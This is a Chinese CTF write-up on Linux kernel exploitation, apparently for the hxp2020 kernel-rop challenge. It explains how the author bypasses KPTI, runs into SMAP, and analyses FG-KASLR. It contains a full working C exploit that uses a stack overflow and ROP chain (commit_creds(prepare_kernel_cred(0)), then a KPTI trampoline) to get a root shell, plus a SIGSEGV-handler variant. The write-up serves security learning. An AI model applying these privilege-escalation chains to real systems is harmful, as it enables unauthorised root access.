#define PTI_SWITCH_MASK         (1 << PAGE_SHIFT)

...

.macro SWITCH_TO_KERNEL_CR3 scratch_reg:req
ALTERNATIVE "jmp .Lend_\@", "", X86_FEATURE_PTI
movl %cr3, \scratch_reg
/* Test if we are already on kernel CR3 */
testl $PTI_SWITCH_MASK, \scratch_reg
jz .Lend_\@
andl $(~PTI_SWITCH_MASK), \scratch_reg
movl \scratch_reg, %cr3
/* Return original CR3 in \scratch_reg */
orl $PTI_SWITCH_MASK, \scratch_reg
.Lend_\@:
.endm

其中,PTI_SWITCH_MASK = 1 << 12,因此这个宏的作用就是简单地判断CR3寄存器中的地址是不是内核页表的地址:通过判断其第13 bit(由低到高,即bit 12)是否为0来确定,如果不是,则将其置0,即切换到8K空间里位于低4K的内核页表。

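在这个版本的在线源码里我没找到SWITCH_TO_USER_CR3_STACK宏,但是可以找到SWITCH_TO_USER_CR3宏的定义:https://elixir.bootlin.com/linux/v5.9-rc6/source/arch/x86/entry/entry_32.S#L134 (注:entry_32.S是32位内核的入口代码;64位内核使用的SWITCH_TO_KERNEL_CR3、SWITCH_TO_USER_CR3_STACK等宏应当定义在arch/x86/entry/calling.h中,核心逻辑同样是对CR3的第13 bit做置位/清零。)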

1
2
3
4
5
6
7
8
9
10
11
#define PTI_SWITCH_MASK         (1 << PAGE_SHIFT)
..
/* Unconditionally switch to user cr3 */
.macro SWITCH_TO_USER_CR3 scratch_reg:req
ALTERNATIVE "jmp .Lend_\@", "", X86_FEATURE_PTI

movl %cr3, \scratch_reg
orl $PTI_SWITCH_MASK, \scratch_reg
movl \scratch_reg, %cr3
.Lend_\@:
.endm

可以看到,在切换回用户态的页表时,也是简单的将CR3寄存器的第13bit置1实现的。

修改题目的qemu启动脚本,添加KPTI机制:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
#!/bin/sh
qemu-system-x86_64 \
-m 128M \
-cpu kvm64,+smep \
-kernel vmlinuz \
-initrd initramfs.cpio.gz \
-hdb flag.txt \
-snapshot \
-nographic \
-monitor /dev/null \
-no-reboot \
-append "kpti=1 nokaslr console=ttyS0 quiet panic=1" \
-s

启动后再次运行level2中的exploit,发生了一个用户态的segmentation fault

1
2
3
4
5
6
7
8
/ $ ./smep2
[*] Saved state
[*] Opened device
[*] Leaked 160 bytes
[*] Cookie: 19d245c9d034ba00
[*] Prepared payload
Segmentation fault

显然,这是由于返回用户态前没有切换回用户态页表,导致运行用户态的第一条指令时,寻址时发生了段错误。

查看dmesg:

1
2
[    5.905184] smep2[113]: segfault at 401f72 ip 0000000000401f72 sp 00007ffc0f990cc0 error 15 in smep2[401000+96000]
[ 5.906710] Code: 09 00 b8 00 00 00 00 e8 ec f7 00 00 48 89 dc 90 48 8b 45 e8 64 48 33 04 25 28 00 00 00 74 05 e8 14 3b 05 00 48 8b 5d f8 c9 c3 <f3> 0f 1e fa 55 48 89 e5 48 8d 3d fb 50 09 00 e5

这是一个error 15的段错误,在https://utcc.utoronto.ca/~cks/space/blog/linux/KernelSegfaultErrorCodes 这里可以查到error 15的含义:

error 15: attempt to execute code from a mapped memory area that isn’t executable.

根据https://www.kernel.org/doc/html/latest/x86/pti.html 的说法“the user portion of the kernel page tables is crippled by setting the NX bit in the top level”可以知道,虽然内核页表也包括了用户空间的地址映射,但是将用户空间部分的都标记成了NX不可执行,因此会导致segmentation fault

3.2 恢复用户态页表

那么,要完成漏洞利用,正常返回用户态,就需要像上面内核代码所做的那样,在切换回用户态前先将CR3寄存器切换成用户态页表,也就是 CR3 |= (1 << 12)。

一开始,我构造了一些gadget用ROP来完成CR3 |= (1 << 12),如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
...
unsigned long mov_rax_cr3_pop1_ret = 0xffffffff8146d494; // mov rax, cr3; pop rbp; ret;
unsigned long pop_rdx_ret = 0xffffffff81007616; // pop rdx; ret;
unsigned long or_rax_rdx_ret = 0xffffffff8142192a; // or rax, rdx; ret;
unsigned long mov_cr3_rax_pop1_ret = 0xffffffff81477e47; // mov cr3, rax; pop rbp; ret;

void overflow(void){
unsigned n = 50;
unsigned long payload[n];
unsigned off = 16;
payload[off++] = cookie;
payload[off++] = 0x0; // rbx
payload[off++] = 0x0; // r12
payload[off++] = 0x0; // rbp

// commit_creds(prepare_kernel_cred(0))
...

// change cr3 to user page table
payload[off++] = mov_rax_cr3_pop1_ret;
payload[off++] = 0;
payload[off++] = pop_rdx_ret;
payload[off++] = 0x1000;
payload[off++] = or_rax_rdx_ret;
payload[off++] = mov_cr3_rax_pop1_ret;
payload[off++] = 0;

// ret to user space
payload[off++] = swapgs_pop1_ret;
payload[off++] = 0;
payload[off++] = iretq;
payload[off++] = user_rip;
payload[off++] = user_cs;
payload[off++] = user_rflags;
payload[off++] = user_sp;
payload[off++] = user_ss;
...
}

在提权和返回用户态中间添加了修改CR3的ROP,但是,这样编译运行的话会直接导致内核崩溃:

这是一个double fault,意思是在exception的handle中发生exception。

通过调试,可以发现,是在修改了cr3寄存器之后发生的:

可以判断到原因:切换到用户态的页表后,此时的栈指针还是一个内核栈的指针,在随后的pop rbp指令中,需要访问栈,而用户态页表中没有这个内核栈的地址映射,此时就会发生缺页异常

所以这里我自己构造的ROP,由于没有解决内核栈寻址的问题,就会导致内核崩溃。

因此,可以使用内核中写好的切换用户态页表的代码来去做,内核自己写的代码当然考虑会周全些,这个内核函数就是**swapgs_restore_regs_and_return_to_usermode**:

1
2
/ $ cat ./kallsyms | grep swapgs_restore_regs_and_return_to_usermode
ffffffff81200f10 T swapgs_restore_regs_and_return_to_usermode

此函数的汇编代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
(gdb) x/10i 0xffffffff81200f10
0xffffffff81200f10 <_stext+2101008>: pop %r15
0xffffffff81200f12 <_stext+2101010>: pop %r14
0xffffffff81200f14 <_stext+2101012>: pop %r13
0xffffffff81200f16 <_stext+2101014>: pop %r12
0xffffffff81200f18 <_stext+2101016>: pop %rbp
0xffffffff81200f19 <_stext+2101017>: pop %rbx
0xffffffff81200f1a <_stext+2101018>: pop %r11
0xffffffff81200f1c <_stext+2101020>: pop %r10
0xffffffff81200f1e <_stext+2101022>: pop %r9
0xffffffff81200f20 <_stext+2101024>: pop %r8
(gdb)
0xffffffff81200f22 <_stext+2101026>: pop %rax
0xffffffff81200f23 <_stext+2101027>: pop %rcx
0xffffffff81200f24 <_stext+2101028>: pop %rdx
0xffffffff81200f25 <_stext+2101029>: pop %rsi
0xffffffff81200f26 <_stext+2101030>: mov %rsp,%rdi ; 保存旧栈
0xffffffff81200f29 <_stext+2101033>: mov %gs:0x6004,%rsp ; 更换栈
0xffffffff81200f32 <_stext+2101042>: pushq 0x30(%rdi) ; 把旧栈中的值压到新栈
0xffffffff81200f35 <_stext+2101045>: pushq 0x28(%rdi)
0xffffffff81200f38 <_stext+2101048>: pushq 0x20(%rdi)
0xffffffff81200f3b <_stext+2101051>: pushq 0x18(%rdi)
(gdb)
0xffffffff81200f3e <_stext+2101054>: pushq 0x10(%rdi)
0xffffffff81200f41 <_stext+2101057>: pushq (%rdi)
0xffffffff81200f43 <_stext+2101059>: push %rax
0xffffffff81200f44 <_stext+2101060>: xchg %ax,%ax
0xffffffff81200f46 <_stext+2101062>: mov %cr3,%rdi
0xffffffff81200f49 <_stext+2101065>: jmp 0xffffffff81200f7f <_stext+2101119>
...
(gdb) x/10i 0xffffffff81200f7f
0xffffffff81200f7f <_stext+2101119>: or $0x1000,%rdi
0xffffffff81200f86 <_stext+2101126>: mov %rdi,%cr3
0xffffffff81200f89 <_stext+2101129>: pop %rax
0xffffffff81200f8a <_stext+2101130>: pop %rdi
0xffffffff81200f8b <_stext+2101131>: swapgs
0xffffffff81200f8e <_stext+2101134>: nopl (%rax)
0xffffffff81200f91 <_stext+2101137>: jmpq 0xffffffff81200fc0 <_stext+2101184>
...
(gdb) x/10i 0xffffffff81200fc0
0xffffffff81200fc0 <_stext+2101184>: testb $0x4,0x20(%rsp)
0xffffffff81200fc5 <_stext+2101189>: jne 0xffffffff81200fc9 <_stext+2101193>
0xffffffff81200fc7 <_stext+2101191>: iretq


可以看到,在修改cr3寄存器之前,执行了一条 mov %gs:0x6004, %rsp指令来进行栈的切换,我猜测gs:0x6004处的值在用户态页表中也有映射,防止切换用户态页表后栈寻址失败的问题。并且通过rdi寄存器,将原本栈顶的若干个值都push到了新栈中。

可以看到这个函数开头有一大堆的pop,为了减少payload长度,ROP可以从这个函数的第一条mov指令0xffffffff81200f26开始执行。根据此函数的汇编代码,可以确认旧栈顶开始的第3至第7个值,会保存到新栈中并作为最后iretq时的栈布局,因此可以构造好rop的payload:

1
2
3
4
5
6
7
8
9
// switch user space cr3 and swapgs and iretq
payload[off++] = 0xffffffff81200f26; // swapgs_restore_regs_and_return_to_usermode
payload[off++] = 0;
payload[off++] = 0;
payload[off++] = user_rip;
payload[off++] = user_cs;
payload[off++] = user_rflags;
payload[off++] = user_sp;
payload[off++] = user_ss;

成功着陆用户态get root shell:

完整exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
// gcc ret2usr.c -fPIE -static -o ret2usr

#define _GNU_SOURCE
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sched.h>
#include <sys/mman.h>
#include <signal.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <linux/userfaultfd.h>
#include <sys/wait.h>
#include <poll.h>
#include <unistd.h>
#include <stdlib.h>


int global_fd;

// 打开 /dev/hackme 设备
void open_dev(){
global_fd = open("/dev/hackme", O_RDWR);
if (global_fd < 0){
puts("[!] Failed to open device");
exit(-1);
} else {
puts("[*] Opened device");
}
}

unsigned long user_cs, user_ss, user_rflags, user_sp;

// 将后面iretq时需要恢复的寄存器保存到本地变量中
void save_state(){
__asm__(
".intel_syntax noprefix;"
"mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;"
".att_syntax;"
);
puts("[*] Saved state");
}

void print_leak(unsigned long *leak, unsigned n) {
for (unsigned i = 0; i < n; ++i) {
printf("%u: %lx\n", i, leak[i]);
}
}

unsigned long cookie;

void leak(void){
unsigned n = 20;
unsigned long leak[n];
ssize_t r = read(global_fd, leak, sizeof(leak));
cookie = leak[16]; // cookie与tmp偏移0x80

printf("[*] Leaked %zd bytes\n", r);
//print_leak(leak, n);
printf("[*] Cookie: %lx\n", cookie);
}

// 判断当前用户id后运行system("/bin/sh")
void get_shell(void){
puts("[*] Returned to userland");
if (getuid() == 0){
printf("[*] UID: %d, got root!\n", getuid());
system("/bin/sh");
} else {
printf("[!] UID: %d, didn't get root\n", getuid());
exit(-1);
}
}

unsigned long user_rip = (unsigned long)get_shell; // 返回用户态后起shell

unsigned long pop_rdi_ret = 0xffffffff81006370; // pop rdi; ret;
unsigned long native_write_cr4 = 0xffffffff814443e0; // 新版本不能关闭smep smap
unsigned long prepare_kernel_cred = 0xffffffff814c67f0;
unsigned long commit_creds = 0xffffffff814c6410;
unsigned long mov_rdi_rax = 0xffffffff816bf203; // mov rdi, rax; mov qword ptr [rsi + 0x140], rdi; pop rbp; ret;

void overflow(void){
unsigned n = 50;
unsigned long payload[n];
unsigned off = 16;
payload[off++] = cookie;
payload[off++] = 0x0; // rbx
payload[off++] = 0x0; // r12
payload[off++] = 0x0; // rbp

// commit_creds(prepare_kernel_cred(0))
payload[off++] = pop_rdi_ret; // return address
payload[off++] = 0;
payload[off++] = prepare_kernel_cred;
payload[off++] = mov_rdi_rax; // mov rdi, rax; mov qword ptr [rsi + 0x140], rdi; pop rbp; ret;
payload[off++] = 0;
payload[off++] = commit_creds;

// switch user space cr3 and swapgs and iretq
payload[off++] = 0xffffffff81200f26; // swapgs_restore_regs_and_return_to_usermode
payload[off++] = 0;
payload[off++] = 0;
payload[off++] = user_rip;
payload[off++] = user_cs;
payload[off++] = user_rflags;
payload[off++] = user_sp;
payload[off++] = user_ss;

puts("[*] Prepared payload");
ssize_t w = write(global_fd, payload, sizeof(payload));

puts("[!] Should never be reached");
}

/*
 * Exploit driver: save the userland state, open the device, leak the stack
 * cookie, then send the overflow. On success overflow() never returns here.
 */
int main() {
    save_state();
    open_dev();
    leak();       // fills in the global cookie
    overflow();   // control continues in get_shell() when the chain works

    puts("[!] Should never be reached");
    return 0;
}

/*
0xffffffff81200f26 <_stext+2101030>: mov %rsp,%rdi ; 保存旧栈
0xffffffff81200f29 <_stext+2101033>: mov %gs:0x6004,%rsp ; 更换栈
0xffffffff81200f32 <_stext+2101042>: pushq 0x30(%rdi) ; 把旧栈中的值压到新栈
0xffffffff81200f35 <_stext+2101045>: pushq 0x28(%rdi)
0xffffffff81200f38 <_stext+2101048>: pushq 0x20(%rdi)
0xffffffff81200f3b <_stext+2101051>: pushq 0x18(%rdi)
(gdb)
0xffffffff81200f3e <_stext+2101054>: pushq 0x10(%rdi)
0xffffffff81200f41 <_stext+2101057>: pushq (%rdi)
0xffffffff81200f43 <_stext+2101059>: push %rax
0xffffffff81200f44 <_stext+2101060>: xchg %ax,%ax
0xffffffff81200f46 <_stext+2101062>: mov %cr3,%rdi
0xffffffff81200f49 <_stext+2101065>: jmp 0xffffffff81200f7f <_stext+2101119>
...
(gdb) x/10i 0xffffffff81200f7f
0xffffffff81200f7f <_stext+2101119>: or $0x1000,%rdi
0xffffffff81200f86 <_stext+2101126>: mov %rdi,%cr3
0xffffffff81200f89 <_stext+2101129>: pop %rax
0xffffffff81200f8a <_stext+2101130>: pop %rdi
0xffffffff81200f8b <_stext+2101131>: swapgs
0xffffffff81200f8e <_stext+2101134>: nopl (%rax)
0xffffffff81200f91 <_stext+2101137>: jmpq 0xffffffff81200fc0 <_stext+2101184>
...
(gdb) x/10i 0xffffffff81200fc0
0xffffffff81200fc0 <_stext+2101184>: testb $0x4,0x20(%rsp)
0xffffffff81200fc5 <_stext+2101189>: jne 0xffffffff81200fc9 <_stext+2101193>
0xffffffff81200fc7 <_stext+2101191>: iretq

*/

3.3 Signal Handler

https://trungnguyen1909.github.io/blog/post/matesctf/KSMASH/
https://github.com/TrungNguyen1909/writeups/blob/master/matesctf/KSMASH/exploit.c

从参考文章里看到的一种方法,在exp中将get_shell的函数注册为SIGSEGV信号处理函数,然后当直接返回用户态导致segmentation fault时,就会去执行对应的signal handler即get_shell函数。

完整exp如下,相较2.2节的EXP仅仅添加了一行signal(SIGSEGV,get_shell)。最后可以成功执行get_shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
...

// SIGSEGV handler: check the current uid and, if it is root, run system("/bin/sh").
// The signal number argument is ignored.
void get_shell(int not_used){
    puts("[*] Catch fault");

    if (getuid() != 0){
        printf("[!] UID: %d, didn't get root\n", getuid());
        exit(-1);
    }

    printf("[*] UID: %d, got root!\n", getuid());
    system("/bin/sh");
    exit(0);
}

/*
 * Send the stack-overflow payload for the signal-handler variant.
 *
 * The chain returns to userland with a bare swapgs + iretq (no page-table
 * switch); the resulting fault is what triggers the SIGSEGV handler
 * registered in main(). The "..." line is the writeup's elision of the
 * commit_creds(prepare_kernel_cred(0)) part of the chain.
 */
void overflow(void){
    unsigned n = 50;
    unsigned long payload[n];
    unsigned off = 16; // the chain starts at the stack cookie slot
    payload[off++] = cookie;
    payload[off++] = 0x0; // rbx
    payload[off++] = 0x0; // r12
    payload[off++] = 0x0; // rbp

    // commit_creds(prepare_kernel_cred(0))
    ...

    // ret to user space
    payload[off++] = 0xffffffff8100a55f; // swapgs; pop rbp; ret;
    payload[off++] = 0;
    payload[off++] = 0xffffffff814381cb; // iretq;
    payload[off++] = (unsigned long)get_shell; // rip (explicit cast: function pointer stored as an integer)
    payload[off++] = user_cs;
    payload[off++] = user_rflags;
    payload[off++] = user_sp;
    payload[off++] = user_ss;

    puts("[*] Prepared payload");
    ssize_t w = write(global_fd, payload, sizeof(payload));

    puts("[!] Should never be reached");
}

/*
 * Exploit driver for the signal-handler variant: get_shell is installed as
 * the SIGSEGV handler before the usual save/open/leak/overflow sequence.
 */
int main() {
    signal(SIGSEGV,get_shell);

    save_state();
    open_dev();
    leak();
    overflow();   // on success the process continues in get_shell()

    puts("[!] Should never be reached");
    return 0;
}

这里其实有一个问题网上没找到答案:get_shell()函数也是在用户态的,按理说内核页表中用户态的页应该都是Non-Executable的才对,为什么添加了signal(SIGSEGV, get_shell)后get_shell()函数可以正常执行?

调试EXP后可以搞清楚这个问题。

可以看到,iretq返回用户态的get_shell()函数后,执行第一条指令时就触发了一个异常,进入了内核的异常处理,cr2寄存器中存着发生异常的get_shell函数的地址,此时可以看到,cr3寄存器中的页表地址,第12bit为0,是内核页表。

在get_shell函数下断点,继续往下运行,断下来时再查看,就会发现cr3寄存器中的页表地址已经变成了用户态页表,此时可以正常运行get_shell()函数了:

因此可以得出结论,第一次返回用户态时,由于此时的页表没有切换回用户态页表,因此触发了异常,进入到内核的异常处理后,由于先前注册过了用户态的signal handler,因此内核经过一系列的中断处理程序索引后最终会iretq返回用户态指定的signal handler,而内核在返回用户态时,进行了页表切换,因此用户态的signal handler可以正常运行。

Level4 SMAP

SMAP,即Supervisor Mode Access Prevention(特权模式访问保护),用于补充SMEP:当CPU处于内核态时,不能访问用户态地址空间的页。SMAP由控制寄存器CR4的第21位(bit 21)控制。在QEMU启动脚本中,在-cpu中添加+smap可以开启,在-append中添加nosmap可以将其关闭。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
#!/bin/sh
# Boot the challenge kernel under QEMU for the SMAP level:
#   -cpu kvm64,+smep,+smap  -> SMEP and SMAP enabled on the virtual CPU
#   -append "kpti=1 nokaslr ..." -> KPTI on, KASLR off
#   -s -> NOTE(review): QEMU shorthand for a gdb stub on tcp::1234 — confirm against the QEMU docs
qemu-system-x86_64 \
-m 128M \
-cpu kvm64,+smep,+smap \
-kernel vmlinuz \
-initrd initramfs.cpio.gz \
-hdb flag.txt \
-snapshot \
-nographic \
-monitor /dev/null \
-no-reboot \
-append "kpti=1 nokaslr console=ttyS0 quiet panic=1" \
-s

开启SMAP后,再去运行2.3中栈迁移的EXP,就会出现double fault错误,内核崩溃退出。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
/ $ ./smep3
[*] Saved state
[*] Opened device
[*] Leaked 160 bytes
[*] Cookie: d928c8f2e47a5f00
[*] Prepared payload
[ 36.341448] traps: PANIC: double fault, error_code: 0x0
[ 36.341741] double fault: 0000 [#1] SMP PTI
[ 36.341764] CPU: 0 PID: 115 Comm: smep3 Tainted: G O 5.9.0-rc6+ #10
[ 36.341778] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.13.0-1ubuntu1.1 04/01/2014
[ 36.341781] RIP: 0010:bit_update_start+0x3f/0x50
[ 36.341787] Code: fb 49 8d 74 24 38 e8 10 2a ff ff 8b 53 60 41 89 54 24 48 8b 53 64 41 89 54 24 4c 8b 93 d4 00 00 00 41 89 94 24 bc 00 00 00 5b <41> 5c 5d c3 00 00 00 00 00 00 00 00 00 00 0
[ 36.341839] RSP: 0018:000000005b000000 EFLAGS: 00000296
[ 36.342007] RAX: 0000000000000190 RBX: 0000000000000000 RCX: 0000000000000000
[ 36.342011] RDX: 0000000000000010 RSI: ffffffffc00025c0 RDI: ffffc900001bff88
[ 36.342014] RBP: 0000000000000000 R08: d928c8f2e47a5f00 R09: 00000000000000a0
[ 36.342017] R10: d928c8f2e47a5f00 R11: 00000000000000a0 R12: 0000000000000000
[ 36.342020] R13: ffffc900001bfef0 R14: 00007ffcb07b5fb0 R15: ffff88800688a300
[ 36.342023] FS: 0000000001373880(0000) GS:ffff888007800000(0000) knlGS:0000000000000000
[ 36.342026] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 36.342029] CR2: 000000005afffff8 CR3: 0000000006112000 CR4: 00000000003006f0
[ 36.342031] Call Trace:
[ 36.342033] Modules linked in: hackme(O)
[ 36.349527] ---[ end trace 479f1c29355f2449 ]---
[ 36.349532] RIP: 0010:bit_update_start+0x3f/0x50
[ 36.349558] Code: fb 49 8d 74 24 38 e8 10 2a ff ff 8b 53 60 41 89 54 24 48 8b 53 64 41 89 54 24 4c 8b 93 d4 00 00 00 41 89 94 24 bc 00 00 00 5b <41> 5c 5d c3 00 00 00 00 00 00 00 00 00 00 0
[ 36.349563] RSP: 0018:000000005b000000 EFLAGS: 00000296
[ 36.349570] RAX: 0000000000000190 RBX: 0000000000000000 RCX: 0000000000000000
[ 36.349573] RDX: 0000000000000010 RSI: ffffffffc00025c0 RDI: ffffc900001bff88
[ 36.349576] RBP: 0000000000000000 R08: d928c8f2e47a5f00 R09: 00000000000000a0
[ 36.349579] R10: d928c8f2e47a5f00 R11: 00000000000000a0 R12: 0000000000000000
[ 36.349581] R13: ffffc900001bfef0 R14: 00007ffcb07b5fb0 R15: ffff88800688a300
[ 36.349585] FS: 0000000001373880(0000) GS:ffff888007800000(0000) knlGS:0000000000000000
[ 36.349587] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 36.349590] CR2: 000000005afffff8 CR3: 0000000006112000 CR4: 00000000003006f0
[ 36.349593] Kernel panic - not syncing: Fatal exception in interrupt
[ 36.350173] Kernel Offset: disabled

这是由于2.3栈迁移的EXP中,将内核栈迁移到了用户态地址空间中,然后在ret到新栈上的地址时,访问了用户态地址,导致了double fault。

要绕过的话,就是像2.1节中,一般是通过内核的gadget去将其关闭,但是在高版本中,SMAP和SMEP的比特都被内核标记为pinned固定了,无法通过内核gadget去将其关闭。

Level5 KASLR

5.1 KASLR与FG-KASLR

KASLR,即内核地址空间布局随机化 Kernel address space layout randomization (KASLR)

参考Linux KASLR机制详解,linux kernel的layout:

上图中的vmlinux.relocs就是内核重定位表。内核重定位表用于对内核虚拟地址的重定位操作,我们知道内核的默认虚拟基地址是: 0xffffffff81000000(内核占用0xffffffff80000000~0xffffffffC0000000这1G虚拟地址空间),当我们在编译内核的时候,如果设置.config文件中的CONFIG_RANDOMIZE_BASE=y,那么在将compressed kernel解压到randomized physical address后,还要对kernel中的虚拟地址进行randomize,这时就要知道内核中哪些地方的虚拟地址需要relocate,内核重定位表就记录了内核中所有需要重定位的虚拟地址的位置。

普通的KASLR开启后,会将内核的装载地址随机化(包括物理地址和虚拟地址),这样的话,随机的是整一个段,而段内的各个内核符号偏移还是固定的。意思是只要知道了装载的基地址,其他的内核函数地址就可以通过固定偏移计算出来。以这道题为例,只要在栈上泄漏某个.text段的内核地址,然后通过固定的偏移就可以计算出内核.text段的基地址,从而计算出其他内核函数的地址,很轻易就能完成漏洞利用。

但是,这道题中使用的是特殊的随机化——FG-KASLR(Function Granular KASLR),它是基于函数的粒度去进行随机化的,也就是说,每次启动内核,会对每个函数的地址分别进行随机化,而不仅仅是对整个.text段做整体随机化。

参考CTF WIKI - FGKASLR,FGKASLR利用了gcc的编译选项-ffunction-sections把内核中的不同函数放进不同的section中,而不是像以前一样放在默认的.text段里。在编译的过程中,任何使用 C 语言编写的函数以及不在特殊输入节的函数都会单独作为一个节;使用汇编编写的代码会位于一个统一的节中。

用readelf -S vmlinux查看vmlinux的节区头,可以看到,这道题目的vmlinux有三万六千多个节区,内核函数都被单独放在了.text.[func_name]的节区中:

而一个没有开启FGKASLR的内核节区:

5.2 FG-KASLR的绕过

5.2.1 FGKASLR弱点

CTF WIKI FGKASLR中给出了一个名为layout_randomized_image的代码,内核启动时是在这个函数中计算要进行随机化的节区,添加到sections数组中。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
/*
* now we need to walk through the section headers and collect the
* sizes of the .text sections to be randomized.
*/
for (i = 0; i < shnum; i++) {
s = &sechdrs[i];
sname = secstrings + s->sh_name;

if (s->sh_type == SHT_SYMTAB) {
/* only one symtab per image */
if (symtab)
error("Unexpected duplicate symtab");

symtab = malloc(s->sh_size);
if (!symtab)
error("Failed to allocate space for symtab");

memcpy(symtab, output + s->sh_offset, s->sh_size);
num_syms = s->sh_size / sizeof(*symtab);
continue;
}

if (s->sh_type == SHT_STRTAB && i != ehdr->e_shstrndx) {
if (strtab)
error("Unexpected duplicate strtab");

strtab = malloc(s->sh_size);
if (!strtab)
error("Failed to allocate space for strtab");

memcpy(strtab, output + s->sh_offset, s->sh_size);
}

if (!strcmp(sname, ".text")) {
if (text)
error("Unexpected duplicate .text section");

text = s;
continue;
}

if (!strcmp(sname, ".data..percpu")) {
/* get start addr for later */
percpu = s;
continue;
}

if (!(s->sh_flags & SHF_ALLOC) ||
!(s->sh_flags & SHF_EXECINSTR) ||
!(strstarts(sname, ".text")))
continue;

sections[num_sections] = s;

num_sections++;
}
sections[num_sections] = NULL;
sections_size = num_sections;

根据代码中的条件判断语句,可以得出以下结论:

  • 类型为SHT_SYMTAB的段不参与FG随机化,也就是.symtab

  • 类型为SHT_STRTAB的段不参与FG随机化,也就是.strtab

  • .text段不参与随机化

    1
    [ 1] .text         PROGBITS        ffffffff81000000 200000 400dd7 00  AX  0   0 4096
  • .data..percpu段不参与FG随机化

  • 节区头的flag中,同时有SHF_ALLOC和SHF_EXECINSTR,且名称以.text开头的节区才参与FG随机化

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    root@ubun2004:~/pwn/hxp2020/kernel-rop# readelf --section-headers -W vmlinux| grep -vE " .text|AX"
    There are 36140 section headers, starting at offset 0x25c1420:

    Section Headers:
    [Nr] Name Type Address Off Size ES Flg Lk Inf Al
    ...
    ...
    [36106] .rodata PROGBITS ffffffff81c00000 e00000 382241 00 WA 0 0 4096
    [36107] .pci_fixup PROGBITS ffffffff81f82250 1182250 002ed0 00 A 0 0 16
    [36108] .tracedata PROGBITS ffffffff81f85120 1185120 000078 00 A 0 0 1
    [36109] __ksymtab PROGBITS ffffffff81f85198 1185198 00b424 00 A 0 0 4
    [36110] __ksymtab_gpl PROGBITS ffffffff81f905bc 11905bc 00dab8 00 A 0 0 4
    [36111] __ksymtab_strings PROGBITS ffffffff81f9e074 119e074 027a82 01 AMS 0 0 1
    [36112] __init_rodata PROGBITS ffffffff81fc5b00 11c5b00 000230 00 A 0 0 32
    [36113] __param PROGBITS ffffffff81fc5d30 11c5d30 002990 00 A 0 0 8
    [36114] __modver PROGBITS ffffffff81fc86c0 11c86c0 000078 00 A 0 0 8
    [36115] __ex_table PROGBITS ffffffff81fc8740 11c8740 001c50 00 A 0 0 4
    [36116] .notes NOTE ffffffff81fca390 11ca390 0001ec 00 A 0 0 4
    [36117] .data PROGBITS ffffffff82000000 1200000 215d80 00 WA 0 0 8192
    [36118] __bug_table PROGBITS ffffffff82215d80 1415d80 01134c 00 WA 0 0 1
    [36119] .vvar PROGBITS ffffffff82228000 1428000 001000 00 WA 0 0 16
    [36120] .data..percpu PROGBITS 0000000000000000 1600000 02e000 00 WA 0 0 4096
    [36122] .rela.init.text RELA 0000000000000000 24d4410 000180 18 I 36137 36121 8
    [36124] .init.data PROGBITS ffffffff822b6000 16b6000 18d1a0 00 WA 0 0 8192
    [36125] .x86_cpu_dev.init PROGBITS ffffffff824431a0 18431a0 000028 00 A 0 0 8
    [36126] .parainstructions PROGBITS ffffffff824431c8 18431c8 01e04c 00 A 0 0 8
    [36127] .altinstructions PROGBITS ffffffff82461218 1861218 003a9a 00 A 0 0 1
    [36129] .iommu_table PROGBITS ffffffff82465bb0 1865bb0 0000a0 00 A 0 0 8
    [36130] .apicdrivers PROGBITS ffffffff82465c50 1865c50 000038 00 WA 0 0 8
    [36132] .smp_locks PROGBITS ffffffff82468000 1868000 007000 00 A 0 0 4
    [36133] .data_nosave PROGBITS ffffffff8246f000 186f000 001000 00 WA 0 0 4
    [36134] .bss NOBITS ffffffff82470000 1870000 590000 00 WA 0 0 4096
    [36135] .brk NOBITS ffffffff82a00000 1870000 02c000 00 WA 0 0 1
    [36136] .init.scratch PROGBITS ffffffff82c00000 2000000 400000 00 WA 0 0 32
    [36137] .symtab SYMTAB 0000000000000000 2400000 0d3a40 18 36138 36107 8
    [36138] .strtab STRTAB 0000000000000000 24d3a40 0000ce 00 0 0 1
    [36139] .shstrtab STRTAB 0000000000000000 24d4590 0ece8d 00 0 0 1
    Key to Flags:
    W (write), A (alloc), X (execute), M (merge), S (strings), I (info),
    L (link order), O (extra OS processing required), G (group), T (TLS),
    C (compressed), x (unknown), o (OS specific), E (exclude),
    l (large), p (processor specific)

